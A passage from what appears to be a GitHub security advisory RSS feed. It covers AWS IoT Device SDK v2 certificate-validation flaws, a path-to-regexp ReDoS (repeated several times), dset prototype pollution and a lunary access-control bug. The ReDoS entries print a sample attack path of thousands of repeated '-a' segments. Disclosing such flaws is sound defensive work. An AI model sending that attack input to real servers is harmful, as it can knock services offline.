<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[dset] dset Prototype Pollution vulnerability</title>
<description><p>Versions of the package dset before 3.1.4 are vulnerable to Prototype Pollution via the dset function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property <strong>proto</strong>, which is recursively assigned to all the objects in the program.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21529">https://nvd.nist.gov/vuln/detail/CVE-2024-21529</a></li>
<li><a href="https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa">https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-DSET-7116691">https://security.snyk.io/vuln/SNYK-JS-DSET-7116691</a></li>
<li><a href="https://github.com/advisories/GHSA-f6v4-cf5j-vf3w">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</guid>
<author>GitHub</author>
</item>
<item>
<title>[lunary] lunary-ai/lunary Access Control Vulnerability in Prompt Variation Management</title>
<description><p>In lunary-ai/lunary version 1.2.13, an insufficient granularity of access control vulnerability allows users to create, update, get, and delete prompt variations for datasets not owned by their organization. This issue arises due to the application not properly validating the ownership of dataset prompts and their variations against the organization or project of the requesting user. As a result, unauthorized modifications to dataset prompts can occur, leading to altered or removed dataset prompts without proper authorization. This vulnerability impacts the integrity and consistency of dataset information, potentially affecting the results of experiments.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-5389">https://nvd.nist.gov/vuln/detail/CVE-2024-5389</a></li>
<li><a href="https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2">https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2</a></li>
<li><a href="https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e">https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e</a></li>
<li><a href="https://github.com/advisories/GHSA-3mwc-2cj7-gx8c">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
